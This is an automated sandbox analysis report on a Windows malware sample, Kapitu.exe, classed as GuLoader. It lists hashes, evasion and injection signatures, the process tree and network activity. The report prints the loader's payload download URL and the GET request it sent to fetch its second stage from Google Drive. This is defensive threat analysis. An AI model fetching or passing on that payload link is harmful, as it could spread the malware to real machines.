Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Kapitu.exe

Overview

General Information

Sample Name:Kapitu.exe
Analysis ID:1364
MD5:149b6bd6b0d3dd2b0fbb111632d59fcc
SHA1:33cdaa42e1a5c1fad1aa4f38dd9ad6ea75113aa7
SHA256:b622dbe802148305104ef456835748d2fc0d8edeffa64787c43c78bcb1914b2f
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
One or more processes crash
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • Kapitu.exe (PID: 6732 cmdline: 'C:\Users\user\Desktop\Kapitu.exe' MD5: 149B6BD6B0D3DD2B0FBB111632D59FCC)
    • RegAsm.exe (PID: 6972 cmdline: 'C:\Users\user\Desktop\Kapitu.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 5608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloadV"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: Kapitu.exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloadV"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: Kapitu.exeVirustotal: Detection: 20%Perma Link
        Source: Kapitu.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49788 version: TLS 1.2
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb( source: WerFault.exe, 00000014.00000003.19018976729.0000000006CBA000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb( source: WerFault.exe, 00000014.00000003.19001076210.0000000005D92000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb( source: WerFault.exe, 00000014.00000003.19016612435.00000000068A6000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.18994554215.00000000030E6000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.18996243688.00000000064AC000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.18998561649.0000000005D98000.00000004.00000001.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000014.00000003.19026340881.00000000070C2000.00000004.00000001.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.18994746142.00000000030FC000.00000004.00000001.sdmp
        Source: Binary string: RegAsm.pdb source: WerFault.exe, 00000014.00000003.19054366223.00000000053E1000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.19001022681.0000000005D87000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.18994350026.0000000003081000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdbd source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.18999101834.00000000064C3000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.19000012560.0000000006895000.00000004.00000001.sdmp
        Source: Binary string: qncryptsslp.pdb source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb( source: WerFault.exe, 00000014.00000003.18998561649.0000000005D98000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb source: WerFault.exe, 00000014.00000003.19005134690.00000000064BD000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000014.00000003.19018976729.0000000006CBA000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb( source: WerFault.exe, 00000014.00000003.18996215101.00000000064A7000.00000004.00000001.sdmp
        Source: Binary string: schannel.pdb source: WerFault.exe, 00000014.00000003.19022355299.00000000070BC000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000014.00000003.19017856487.0000000006F89000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb( source: WerFault.exe, 00000014.00000003.18996243688.00000000064AC000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdb: source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.19020426514.00000000068B1000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb( source: WerFault.exe, 00000014.00000003.19017856487.0000000006F89000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdbU$ source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb( source: WerFault.exe, 00000014.00000003.19032365056.0000000007588000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: srvcli.pdb source: WerFault.exe, 00000014.00000003.19024960609.0000000006FF2000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000014.00000003.18994396652.0000000003086000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.19020466166.00000000068B7000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.18999101834.00000000064C3000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.18996215101.00000000064A7000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.19002140835.00000000068CD000.00000004.00000001.sdmp
        Source: Binary string: dpapi.pdb( source: WerFault.exe, 00000014.00000003.19024255597.00000000070D8000.00000004.00000001.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000014.00000003.19054366223.00000000053E1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000014.00000003.19001022681.0000000005D87000.00000004.00000001.sdmp
        Source: Binary string: gpapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb( source: WerFault.exe, 00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.18994697722.00000000030F7000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000014.00000003.18999955983.000000000688A000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000014.00000003.19025389900.00000000070D3000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb( source: WerFault.exe, 00000014.00000003.19030215027.00000000070AF000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdbv< source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.19005718854.000000000689B000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.18996861577.0000000003102000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb7 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb( source: WerFault.exe, 00000014.00000003.18999955983.000000000688A000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.18994554215.00000000030E6000.00000004.00000001.sdmp
        Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdbp source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb source: WerFault.exe, 00000014.00000003.19024255597.00000000070D8000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.18994647821.00000000030F1000.00000004.00000001.sdmp
        Source: Binary string: AcLayers.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: netutils.pdb( source: WerFault.exe, 00000014.00000003.19019857478.000000000704F000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.19006946184.00000000064CE000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000014.00000003.19030215027.00000000070AF000.00000004.00000001.sdmp
        Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.19019857478.000000000704F000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdbB0 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb; source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.18994946811.0000000003113000.00000004.00000001.sdmp
        Source: Binary string: shell32.pdb( source: WerFault.exe, 00000014.00000003.18995383754.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdbu source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdbn source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb/ source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb0 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb( source: WerFault.exe, 00000014.00000003.19025389900.00000000070D3000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb( source: WerFault.exe, 00000014.00000003.18995414777.0000000005D63000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.18994647821.00000000030F1000.00000004.00000001.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.18996911288.000000000310D000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb( source: WerFault.exe, 00000014.00000003.19000012560.0000000006895000.00000004.00000001.sdmp
        Source: Binary string: netutils.pdbz source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.18995383754.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb) source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb( source: WerFault.exe, 00000014.00000003.19022355299.00000000070BC000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000014.00000003.19012140225.00000000070A9000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.19005081330.00000000064B2000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.19005081330.00000000064B2000.00000004.00000001.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.19001051344.0000000005D8D000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000014.00000003.19006667132.00000000068C2000.00000004.00000001.sdmp
        Source: Binary string: Windows.Storage.pdb( source: WerFault.exe, 00000014.00000003.19005718854.000000000689B000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb( source: WerFault.exe, 00000014.00000003.19005134690.00000000064BD000.00000004.00000001.sdmp
        Source: Binary string: sechost.pdb% source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb( source: WerFault.exe, 00000014.00000003.19006667132.00000000068C2000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000014.00000003.19006628664.00000000068BC000.00000004.00000001.sdmp
        Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.18994350026.0000000003081000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.19016612435.00000000068A6000.00000004.00000001.sdmp
        Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.18994746142.00000000030FC000.00000004.00000001.sdmp
        Source: Binary string: setupapi.pdb( source: WerFault.exe, 00000014.00000003.19001051344.0000000005D8D000.00000004.00000001.sdmp
        Source: Binary string: mskeyprotect.pdb( source: WerFault.exe, 00000014.00000003.19026340881.00000000070C2000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbS source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: apphelp.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: sfc_os.pdbG source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb( source: WerFault.exe, 00000014.00000003.18994396652.0000000003086000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000014.00000003.19030119844.000000000769F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000014.00000003.19022770808.00000000068C7000.00000004.00000001.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb# source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb] source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb( source: WerFault.exe, 00000014.00000003.19025355341.00000000070CD000.00000004.00000001.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.19007270851.00000000068AB000.00000004.00000001.sdmp
        Source: Binary string: AcLayers.pdb( source: WerFault.exe, 00000014.00000003.18994697722.00000000030F7000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdbX* source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: srvcli.pdb( source: WerFault.exe, 00000014.00000003.19024960609.0000000006FF2000.00000004.00000001.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.19020466166.00000000068B7000.00000004.00000001.sdmp
        Source: Binary string: setupapi.pdbK source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.19032365056.0000000007588000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdbL6 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.18996911288.000000000310D000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.19020426514.00000000068B1000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 00000014.00000003.19006628664.00000000068BC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb( source: WerFault.exe, 00000014.00000003.19002140835.00000000068CD000.00000004.00000001.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.18995443411.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.18996861577.0000000003102000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdbA source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000014.00000003.19025355341.00000000070CD000.00000004.00000001.sdmp

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downloadV
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8x-chromium-appcache-fallback-override: disallow-fallbackP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-MvTTUjqOi+ULm6tB1JBGlA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Mon, 27 Sep 2021 13:08:50 GMTExpires: Mon, 27 Sep 2021 13:08:50 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=abKi0BWgcemcd0d8wm9mOlAU2B3arxsDTzzIYttMhyEZI6BWiC6XRhQKgWHtgX8WrOJul08K92QFhtYs9xjnosQK86HWAE8VXopjAbsMkP7rWufpF19a4IJLb_GGIG6TaDkuZEY-t6WXx_m0czyrRfhtLyX5RoUF5UVTrZ9K2D8; expires=Tue, 29-Mar-2022 13:08:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
        Source: RegAsm.exe, 00000005.00000003.16607792811.000000000156A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.19107672383.0000000005D83000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: RegAsm.exe, 00000005.00000003.16607792811.000000000156A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.19107672383.0000000005D83000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: RegAsm.exe, 00000005.00000003.16607792811.000000000156A000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
        Source: RegAsm.exe, 00000005.00000000.18980633011.0000000001530000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Q
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/_a
        Source: RegAsm.exe, 00000005.00000000.18980633011.0000000001530000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRodC
        Source: RegAsm.exe, 00000005.00000000.18980633011.0000000001530000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRodM
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRodg
        Source: WerFault.exe, 00000014.00000003.19075440404.000000000306F000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemet
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
        Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49788 version: TLS 1.2
        Source: WerFault.exe, 00000014.00000003.18995274342.0000000005CBD000.00000004.00000001.sdmpBinary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
        Source: Kapitu.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356
        Source: Kapitu.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\Kapitu.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01109F9D5_2_01109F9D
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01109DB85_2_01109DB8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110F7DC5_2_0110F7DC
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110DD765_2_0110DD76
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110E1B85_2_0110E1B8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110E3A75_2_0110E3A7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01108FCA5_2_01108FCA
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_011073F25_2_011073F2
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_011078075_2_01107807
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110AA775_2_0110AA77
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110F17C NtProtectVirtualMemory,5_2_0110F17C
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01109DB8 NtAllocateVirtualMemory,LoadLibraryA,5_2_01109DB8
        Source: Kapitu.exeVirustotal: Detection: 20%
        Source: Kapitu.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Kapitu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\Kapitu.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Kapitu.exe 'C:\Users\user\Desktop\Kapitu.exe'
